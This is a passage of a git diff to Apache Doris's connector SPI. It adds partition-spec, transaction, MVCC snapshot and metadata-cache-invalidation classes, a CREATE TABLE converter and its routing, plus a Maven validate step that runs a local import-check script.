+ */ +public final class ConnectorPartitionField { + + private final String columnName; + private final String transform; + private final List transformArgs; + + public ConnectorPartitionField(String columnName, String transform, + List transformArgs) { + this.columnName = Objects.requireNonNull(columnName, "columnName"); + this.transform = Objects.requireNonNull(transform, "transform"); + this.transformArgs = transformArgs == null + ? Collections.emptyList() + : Collections.unmodifiableList(transformArgs); + } + + public String getColumnName() { + return columnName; + } + + public String getTransform() { + return transform; + } + + public List getTransformArgs() { + return transformArgs; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof ConnectorPartitionField)) { + return false; + } + ConnectorPartitionField that = (ConnectorPartitionField) o; + return columnName.equals(that.columnName) + && transform.equals(that.transform) + && transformArgs.equals(that.transformArgs); + } + + @Override + public int hashCode() { + return Objects.hash(columnName, transform, transformArgs); + } + + @Override + public String toString() { + if (transformArgs.isEmpty()) { + return transform + "(" + columnName + ")"; + } + return transform + transformArgs + "(" + columnName + ")"; + } +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionSpec.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionSpec.java new file mode 100644 index 00000000000000..2414661f3ed87f --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionSpec.java @@ -0,0 +1,99 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.ddl; + +import java.util.Collections; +import java.util.List; +import java.util.Objects; + +/** + * Partition specification carried by {@link ConnectorCreateTableRequest}. + * + *

{@link Style} distinguishes the four supported partition flavors:

+ *
    + *
  • {@code IDENTITY} — Hive style: {@code PARTITIONED BY (col1, col2)}.
  • + *
  • {@code TRANSFORM} — Iceberg style: {@code PARTITIONED BY (bucket(16, c), year(d))}.
  • + *
  • {@code LIST} — Doris {@code PARTITION BY LIST} with explicit value definitions.
  • + *
  • {@code RANGE} — Doris {@code PARTITION BY RANGE} with [lower, upper) tuples.
  • + *
+ * + *

{@code initialValues} is only meaningful for {@code LIST} / {@code RANGE} styles.

+ */ +public final class ConnectorPartitionSpec { + + public enum Style { + IDENTITY, + TRANSFORM, + LIST, + RANGE, + } + + private final Style style; + private final List fields; + private final List initialValues; + + public ConnectorPartitionSpec(Style style, + List fields, + List initialValues) { + this.style = Objects.requireNonNull(style, "style"); + this.fields = fields == null + ? Collections.emptyList() + : Collections.unmodifiableList(fields); + this.initialValues = initialValues == null + ? Collections.emptyList() + : Collections.unmodifiableList(initialValues); + } + + public Style getStyle() { + return style; + } + + public List getFields() { + return fields; + } + + public List getInitialValues() { + return initialValues; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof ConnectorPartitionSpec)) { + return false; + } + ConnectorPartitionSpec that = (ConnectorPartitionSpec) o; + return style == that.style + && fields.equals(that.fields) + && initialValues.equals(that.initialValues); + } + + @Override + public int hashCode() { + return Objects.hash(style, fields, initialValues); + } + + @Override + public String toString() { + return "ConnectorPartitionSpec{style=" + style + + ", fields=" + fields + + ", initialValues=" + initialValues.size() + "}"; + } +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionValueDef.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionValueDef.java new file mode 100644 index 00000000000000..e86acaa242b4fb --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ddl/ConnectorPartitionValueDef.java @@ -0,0 +1,77 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.ddl; + +import java.util.Collections; +import java.util.List; +import java.util.Objects; + +/** + * Initial value definition for a Doris-style {@code LIST} or {@code RANGE} + * partition declared in a {@code CREATE TABLE} statement. + * + *

For {@code LIST} partitions, {@code values} contains the literal list of + * permitted values (each inner list is one tuple matching the partition columns). + * For {@code RANGE} partitions, {@code values} contains exactly two tuples + * representing the [lower, upper) bound.

+ */ +public final class ConnectorPartitionValueDef { + + private final String partitionName; + private final List> values; + + public ConnectorPartitionValueDef(String partitionName, + List> values) { + this.partitionName = Objects.requireNonNull(partitionName, "partitionName"); + this.values = values == null + ? Collections.emptyList() + : Collections.unmodifiableList(values); + } + + public String getPartitionName() { + return partitionName; + } + + public List> getValues() { + return values; + } + + @Override + public boolean equals(Object o) { + if (this == o) { + return true; + } + if (!(o instanceof ConnectorPartitionValueDef)) { + return false; + } + ConnectorPartitionValueDef that = (ConnectorPartitionValueDef) o; + return partitionName.equals(that.partitionName) + && values.equals(that.values); + } + + @Override + public int hashCode() { + return Objects.hash(partitionName, values); + } + + @Override + public String toString() { + return "ConnectorPartitionValueDef{name='" + partitionName + + "', values=" + values + "}"; + } +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java new file mode 100644 index 00000000000000..39c912d90da8c3 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/handle/ConnectorTransaction.java @@ -0,0 +1,55 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.handle; + +import java.io.Closeable; + +/** + * A connector-managed transaction that scopes one or more write operations. + * + *

Lifecycle: the engine calls {@link #commit()} on success or + * {@link #rollback()} on failure, then always calls {@link #close()} to + * release resources. {@code rollback()} and {@code close()} are safe to + * call multiple times.

+ * + *

Extends the marker {@link ConnectorTransactionHandle} so that existing + * APIs that traffic in opaque handles continue to work without change.

+ */ +public interface ConnectorTransaction extends ConnectorTransactionHandle, Closeable { + + /** Stable transaction ID assigned by the connector. */ + long getTransactionId(); + + /** + * Commits all pending operations bound to this transaction. + * + * @throws org.apache.doris.connector.api.DorisConnectorException + * on conflict, IO failure, or external system error + */ + void commit(); + + /** + * Aborts all pending operations and releases resources. + * Safe to call multiple times; subsequent calls are no-ops. + */ + void rollback(); + + /** Called by the engine after commit OR rollback to release connections etc. */ + @Override + void close(); +} diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java new file mode 100644 index 00000000000000..a023027db4e1e6 --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorMvccSnapshot.java @@ -0,0 +1,112 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.mvcc; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import java.util.Objects; + +/** + * Immutable description of a point-in-time snapshot taken from an MVCC-capable + * external table (Iceberg, Paimon, Hudi, ...). + * + *

Returned by {@code ConnectorMetadata.beginQuerySnapshot} and friends. + * Used by the engine as the MVCC pin for all subsequent reads of the same + * table handle within a query, and serialized into BE scan ranges so the + * read path sees a consistent version.

+ */ +public final class ConnectorMvccSnapshot { + + private final long snapshotId; + private final long timestampMillis; + private final String description; + private final Map properties; + + private ConnectorMvccSnapshot(Builder b) { + this.snapshotId = b.snapshotId; + this.timestampMillis = b.timestampMillis; + this.description = b.description; + this.properties = b.properties.isEmpty() + ? Collections.emptyMap() + : Collections.unmodifiableMap(new HashMap<>(b.properties)); + } + + /** Connector-assigned snapshot identifier (e.g. Iceberg snapshot id). */ + public long getSnapshotId() { + return snapshotId; + } + + /** Wall-clock time at which the snapshot was committed, in ms since epoch. */ + public long getTimestampMillis() { + return timestampMillis; + } + + /** Optional human-readable description; may be empty, never null. */ + public String getDescription() { + return description; + } + + /** Connector-specific metadata propagated to BE. Unmodifiable, never null. */ + public Map getProperties() { + return properties; + } + + public static Builder builder() { + return new Builder(); + } + + public static final class Builder { + + private long snapshotId; + private long timestampMillis; + private String description = ""; + private final Map properties = new HashMap<>(); + + public Builder snapshotId(long snapshotId) { + this.snapshotId = snapshotId; + return this; + } + + public Builder timestampMillis(long timestampMillis) { + this.timestampMillis = timestampMillis; + return this; + } + + public Builder description(String description) { + this.description = Objects.requireNonNull(description, "description"); + return this; + } + + public Builder property(String key, String value) { + this.properties.put( + Objects.requireNonNull(key, "key"), + Objects.requireNonNull(value, "value")); + return this; + } + + public Builder properties(Map properties) { + this.properties.putAll(Objects.requireNonNull(properties, "properties")); + return this; + } + + public ConnectorMvccSnapshot build() { + return new ConnectorMvccSnapshot(this); + } + } +} diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 6c320e2a5fca5d..702d2427badc10 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -92,4 +92,15 @@ default String sanitizeJdbcUrl(String jdbcUrl) { default T executeAuthenticated(Callable task) throws Exception { return task.call(); } + + /** + * Returns the meta invalidator the connector can call to notify the engine + * of external metadata changes (e.g. from HMS notification events). + * + *

Connectors that have no external change notifications can ignore this; + * the default returns {@link ConnectorMetaInvalidator#NOOP}.

+ */ + default ConnectorMetaInvalidator getMetaInvalidator() { + return ConnectorMetaInvalidator.NOOP; + } } diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorMetaInvalidator.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorMetaInvalidator.java new file mode 100644 index 00000000000000..3d94c3c244dc9a --- /dev/null +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorMetaInvalidator.java @@ -0,0 +1,57 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.spi; + +import java.util.List; + +/** + * Callback the connector uses to notify the engine that external metadata + * has changed and cached entries should be dropped (e.g. when an HMS + * notification event reports a CREATE / ALTER / DROP). + * + *

Obtained from {@link ConnectorContext#getMetaInvalidator()}.

+ * + *

Connectors that have no external change notifications can ignore this + * interface entirely; the engine provides a {@link #NOOP} default.

+ */ +public interface ConnectorMetaInvalidator { + + ConnectorMetaInvalidator NOOP = new ConnectorMetaInvalidator() { }; + + /** Invalidates the entire catalog's metadata caches. */ + default void invalidateAll() { } + + /** Invalidates cached metadata for one database. */ + default void invalidateDatabase(String dbName) { } + + /** Invalidates cached metadata for one table. */ + default void invalidateTable(String dbName, String tableName) { } + + /** + * Invalidates cached partition info for one partition. + * + * @param partitionValues partition column values in declared order + * (e.g. {@code ["2024", "01"]} for a table + * partitioned by {@code (year, month)}) + */ + default void invalidatePartition(String dbName, String tableName, + List partitionValues) { } + + /** Invalidates cached statistics for one table (without dropping schema cache). */ + default void invalidateStatistics(String dbName, String tableName) { } +} diff --git a/fe/fe-connector/pom.xml b/fe/fe-connector/pom.xml index ffd042d2d2eb71..e75f30b625d30d 100644 --- a/fe/fe-connector/pom.xml +++ b/fe/fe-connector/pom.xml @@ -51,4 +51,43 @@ under the License. fe-connector-iceberg + + + + + org.codehaus.mojo + exec-maven-plugin + 3.1.0 + false + + + check-connector-imports + validate + + exec + + + + ${project.basedir}/../../tools/check-connector-imports.sh + + ${project.basedir} + + + + + + + + diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorMvccSnapshotAdapter.java b/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorMvccSnapshotAdapter.java new file mode 100644 index 00000000000000..13453b31c80a42 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/ConnectorMvccSnapshotAdapter.java @@ -0,0 +1,43 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.apache.doris.connector.api.mvcc.ConnectorMvccSnapshot; +import org.apache.doris.datasource.mvcc.MvccSnapshot; + +import java.util.Objects; + +/** + * Adapter that lets a connector-provided {@link ConnectorMvccSnapshot} flow through the + * engine's existing {@link MvccSnapshot} contract (consumed by the nereids analyzer and + * the scan plan). Constructed when {@code ConnectorMetadata.beginQuerySnapshot} returns + * a value; passed unchanged through fe-core MVCC pinning, then unwrapped on the BE + * serialization boundary via {@link #getSnapshot()}. + */ +public final class ConnectorMvccSnapshotAdapter implements MvccSnapshot { + + private final ConnectorMvccSnapshot snapshot; + + public ConnectorMvccSnapshotAdapter(ConnectorMvccSnapshot snapshot) { + this.snapshot = Objects.requireNonNull(snapshot, "snapshot"); + } + + public ConnectorMvccSnapshot getSnapshot() { + return snapshot; + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index 896174ad0b49c7..f8b4f5a034098c 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -23,6 +23,7 @@ import org.apache.doris.common.security.authentication.ExecutionAuthenticator; import org.apache.doris.connector.api.ConnectorHttpSecurityHook; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.connector.spi.ConnectorMetaInvalidator; import java.util.Collections; import java.util.HashMap; @@ -90,6 +91,11 @@ public ConnectorHttpSecurityHook getHttpSecurityHook() { return httpSecurityHook; } + @Override + public ConnectorMetaInvalidator getMetaInvalidator() { + return new ExternalMetaCacheInvalidator(catalogId); + } + @Override public String sanitizeJdbcUrl(String jdbcUrl) { try { diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/ExternalMetaCacheInvalidator.java b/fe/fe-core/src/main/java/org/apache/doris/connector/ExternalMetaCacheInvalidator.java new file mode 100644 index 00000000000000..38fc3239d92ba2 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/ExternalMetaCacheInvalidator.java @@ -0,0 +1,82 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.apache.doris.catalog.Env; +import org.apache.doris.connector.spi.ConnectorMetaInvalidator; +import org.apache.doris.datasource.ExternalMetaCacheMgr; + +import java.util.List; +import java.util.Objects; + +/** + * fe-core side bridge from the connector SPI {@link ConnectorMetaInvalidator} to the + * engine's {@link ExternalMetaCacheMgr}. Returned by + * {@link DefaultConnectorContext#getMetaInvalidator()} so connectors that receive + * external change notifications (e.g. HMS notification events) can drop the right + * cache entries without depending on fe-core internals directly. + */ +public final class ExternalMetaCacheInvalidator implements ConnectorMetaInvalidator { + + private final long catalogId; + + public ExternalMetaCacheInvalidator(long catalogId) { + this.catalogId = catalogId; + } + + @Override + public void invalidateAll() { + mgr().invalidateCatalog(catalogId); + } + + @Override + public void invalidateDatabase(String dbName) { + mgr().invalidateDb(catalogId, Objects.requireNonNull(dbName, "dbName")); + } + + @Override + public void invalidateTable(String dbName, String tableName) { + mgr().invalidateTable(catalogId, + Objects.requireNonNull(dbName, "dbName"), + Objects.requireNonNull(tableName, "tableName")); + } + + @Override + public void invalidatePartition(String dbName, String tableName, List partitionValues) { + // The SPI carries partition column VALUES (e.g. ["2024", "01"]) but the engine's + // partition cache is keyed by partition NAMES (e.g. "year=2024/month=01"). + // Reconstructing the name requires partition column names which are not carried by + // the SPI today. Until the SPI grows that metadata, fall back to table-level + // invalidation — correct but over-broad. + mgr().invalidateTable(catalogId, + Objects.requireNonNull(dbName, "dbName"), + Objects.requireNonNull(tableName, "tableName")); + } + + @Override + public void invalidateStatistics(String dbName, String tableName) { + // ExternalMetaCacheMgr exposes no per-table statistics-only invalidation today + // (the row count cache is keyed by id, not name). Calling invalidateTable here + // would violate the SPI contract ("without dropping schema cache"), so leave as + // a no-op until a stats-only entry point exists. + } + + private static ExternalMetaCacheMgr mgr() { + return Env.getCurrentEnv().getExtMetaCacheMgr(); + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java b/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java new file mode 100644 index 00000000000000..1084dd24861203 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java @@ -0,0 +1,209 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.ddl; + +import org.apache.doris.catalog.PartitionType; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.ddl.ConnectorBucketSpec; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.ddl.ConnectorPartitionField; +import org.apache.doris.connector.api.ddl.ConnectorPartitionSpec; +import org.apache.doris.datasource.ConnectorColumnConverter; +import org.apache.doris.nereids.analyzer.UnboundFunction; +import org.apache.doris.nereids.analyzer.UnboundSlot; +import org.apache.doris.nereids.trees.expressions.Expression; +import org.apache.doris.nereids.trees.expressions.literal.IntegerLikeLiteral; +import org.apache.doris.nereids.trees.expressions.literal.Literal; +import org.apache.doris.nereids.trees.plans.commands.info.ColumnDefinition; +import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; +import org.apache.doris.nereids.trees.plans.commands.info.DistributionDescriptor; +import org.apache.doris.nereids.trees.plans.commands.info.PartitionTableInfo; +import org.apache.doris.nereids.types.DataType; + +import java.util.ArrayList; +import java.util.Collections; +import java.util.List; + +/** + * Converts a nereids {@link CreateTableInfo} into a connector-SPI + * {@link ConnectorCreateTableRequest}. + * + *

Covers Hive-style {@code IDENTITY}, Iceberg-style {@code TRANSFORM}, and + * Doris {@code LIST} / {@code RANGE} partitioning, plus hash / random + * distribution.

+ */ +public final class CreateTableInfoToConnectorRequestConverter { + + private CreateTableInfoToConnectorRequestConverter() { + } + + /** + * @param info the nereids CREATE TABLE info (must be analyzed) + * @param dbName target database name (caller may normalize case) + */ + public static ConnectorCreateTableRequest convert(CreateTableInfo info, + String dbName) { + return ConnectorCreateTableRequest.builder() + .dbName(dbName) + .tableName(info.getTableName()) + .columns(convertColumns(info.getColumnDefinitions())) + .partitionSpec(convertPartition(info.getPartitionTableInfo())) + .bucketSpec(convertBucket(info.getDistribution())) + .comment(info.getComment()) + .properties(info.getProperties()) + .ifNotExists(info.isIfNotExists()) + .external(info.isExternal()) + .build(); + } + + // -------- columns -------- + + private static List convertColumns( + List defs) { + if (defs == null || defs.isEmpty()) { + return Collections.emptyList(); + } + List out = new ArrayList<>(defs.size()); + for (ColumnDefinition d : defs) { + DataType nereidsType = d.getType(); + ConnectorType type = ConnectorColumnConverter.toConnectorType( + nereidsType.toCatalogDataType()); + // Default value is not exposed via a public getter on ColumnDefinition + // (private Optional); pass null until the SPI gains a + // typed default-value carrier. See HANDOFF open issues. + out.add(new ConnectorColumn( + d.getName(), type, d.getComment(), + d.isNullable(), null, d.isKey())); + } + return out; + } + + // -------- partition -------- + + private static ConnectorPartitionSpec convertPartition( + PartitionTableInfo info) { + if (info == null) { + return null; + } + String pType = info.getPartitionType(); + List exprs = info.getPartitionList(); + boolean isList = PartitionType.LIST.name().equalsIgnoreCase(pType); + boolean isRange = PartitionType.RANGE.name().equalsIgnoreCase(pType); + boolean hasExprs = exprs != null && !exprs.isEmpty(); + if (!isList && !isRange && !hasExprs) { + return null; + } + + ConnectorPartitionSpec.Style style; + if (isList) { + style = ConnectorPartitionSpec.Style.LIST; + } else if (isRange) { + style = ConnectorPartitionSpec.Style.RANGE; + } else if (hasAnyTransform(exprs)) { + style = ConnectorPartitionSpec.Style.TRANSFORM; + } else { + style = ConnectorPartitionSpec.Style.IDENTITY; + } + + List fields = hasExprs + ? convertFields(exprs) + : Collections.emptyList(); + // LIST/RANGE PartitionDefinition values are not lowered here: each + // PartitionDefinition is a sealed family (InPartition/LessThanPartition/ + // FixedRangePartition/StepPartition) carrying nereids Expressions that + // require full analysis to flatten into List>. Connectors + // that need the initial values today read the Doris PartitionDesc + // directly; this converter passes an empty list and leaves richer + // lowering for a follow-up. + return new ConnectorPartitionSpec(style, fields, Collections.emptyList()); + } + + private static boolean hasAnyTransform(List exprs) { + for (Expression e : exprs) { + if (e instanceof UnboundFunction) { + return true; + } + } + return false; + } + + private static List convertFields( + List exprs) { + List out = new ArrayList<>(exprs.size()); + for (Expression e : exprs) { + if (e instanceof UnboundSlot) { + out.add(new ConnectorPartitionField( + ((UnboundSlot) e).getName(), "identity", + Collections.emptyList())); + } else if (e instanceof UnboundFunction) { + out.add(convertTransformField((UnboundFunction) e)); + } + // Unknown expression shapes are dropped; the connector can still + // honor the spec via its own analysis if richer info is required. + } + return out; + } + + private static ConnectorPartitionField convertTransformField( + UnboundFunction fn) { + String transform = fn.getName().toLowerCase(); + String columnName = null; + List args = new ArrayList<>(); + for (Expression child : fn.children()) { + if (child instanceof UnboundSlot && columnName == null) { + columnName = ((UnboundSlot) child).getName(); + } else if (child instanceof IntegerLikeLiteral) { + args.add(((IntegerLikeLiteral) child).getIntValue()); + } else if (child instanceof Literal) { + Object v = ((Literal) child).getValue(); + if (v instanceof Number) { + args.add(((Number) v).intValue()); + } + } + } + if (columnName == null) { + columnName = fn.toString(); + } + return new ConnectorPartitionField(columnName, transform, args); + } + + // -------- bucket -------- + + private static ConnectorBucketSpec convertBucket(DistributionDescriptor d) { + if (d == null) { + return null; + } + List cols = d.getCols() == null + ? Collections.emptyList() + : d.getCols(); + // bucketNum is private; read it off the translated catalog desc so we + // do not depend on private internals. + int numBuckets = readBucketNum(d); + String algorithm = d.isHash() ? "doris_default" : "doris_random"; + return new ConnectorBucketSpec(cols, numBuckets, algorithm); + } + + private static int readBucketNum(DistributionDescriptor d) { + try { + return d.translateToCatalogStyle().getBuckets(); + } catch (Exception ignored) { + return 0; + } + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index c433523d9a6e75..e78be28583b3a8 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -17,7 +17,9 @@ package org.apache.doris.datasource; +import org.apache.doris.catalog.Env; import org.apache.doris.common.DdlException; +import org.apache.doris.common.UserException; import org.apache.doris.connector.ConnectorFactory; import org.apache.doris.connector.ConnectorSessionBuilder; import org.apache.doris.connector.DefaultConnectorContext; @@ -25,7 +27,11 @@ import org.apache.doris.connector.api.Connector; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTestResult; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.ddl.CreateTableInfoToConnectorRequestConverter; import org.apache.doris.datasource.property.metastore.MetastoreProperties; +import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; import org.apache.doris.qe.ConnectContext; import org.apache.doris.transaction.PluginDrivenTransactionManager; @@ -232,6 +238,44 @@ public Connector getConnector() { return connector; } + /** + * Routes {@code CREATE TABLE} through the SPI's + * {@code ConnectorTableOps.createTable(session, request)} instead of the + * legacy {@code metadataOps} path used by other {@link ExternalCatalog} + * subclasses. + * + *

Connectors that have not overridden the new SPI default fall through + * to the SPI's "CREATE TABLE not supported" exception, which is wrapped + * here as a {@link DdlException} to match the existing caller contract.

+ * + *

The SPI signature is {@code void}: it does not distinguish + * "newly created" from "already existed (IF NOT EXISTS)". This override + * conservatively assumes creation happened and writes the edit log, matching + * the more common branch of the legacy path. Refining this when a connector + * actually needs the distinction is left to P5/P6/P7 connector migrations.

+ */ + @Override + public boolean createTable(CreateTableInfo createTableInfo) throws UserException { + makeSureInitialized(); + ConnectorSession session = buildConnectorSession(); + ConnectorCreateTableRequest request = CreateTableInfoToConnectorRequestConverter + .convert(createTableInfo, createTableInfo.getDbName()); + try { + connector.getMetadata(session).createTable(session, request); + } catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); + } + org.apache.doris.persist.CreateTableInfo persistInfo = + new org.apache.doris.persist.CreateTableInfo( + getName(), + createTableInfo.getDbName(), + createTableInfo.getTableName()); + Env.getCurrentEnv().getEditLog().logCreateTable(persistInfo); + LOG.info("finished to create table {}.{}.{}", getName(), + createTableInfo.getDbName(), createTableInfo.getTableName()); + return false; + } + @Override public String fromRemoteDatabaseName(String remoteDatabaseName) { ConnectorSession session = buildConnectorSession(); diff --git a/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java b/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java index 92ed5830d99fb7..4374a42f674e75 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java +++ b/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java @@ -19,21 +19,33 @@ import org.apache.doris.catalog.Env; import org.apache.doris.common.UserException; +import org.apache.doris.connector.api.handle.ConnectorTransaction; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import java.util.Objects; import java.util.concurrent.ConcurrentHashMap; /** * Transaction manager for plugin-driven external catalogs. * - *

This is a lightweight implementation that generates transaction IDs via - * {@link Env#getNextId()} and tracks them in a local map. The actual commit - * and rollback logic is handled by the connector's {@code ConnectorWriteOps} - * through the insert executor — this manager simply provides the transaction - * lifecycle bookkeeping required by {@link org.apache.doris.nereids.trees.plans - * .commands.insert.BaseExternalTableInsertExecutor}.

+ *

Two entry points:

+ *
    + *
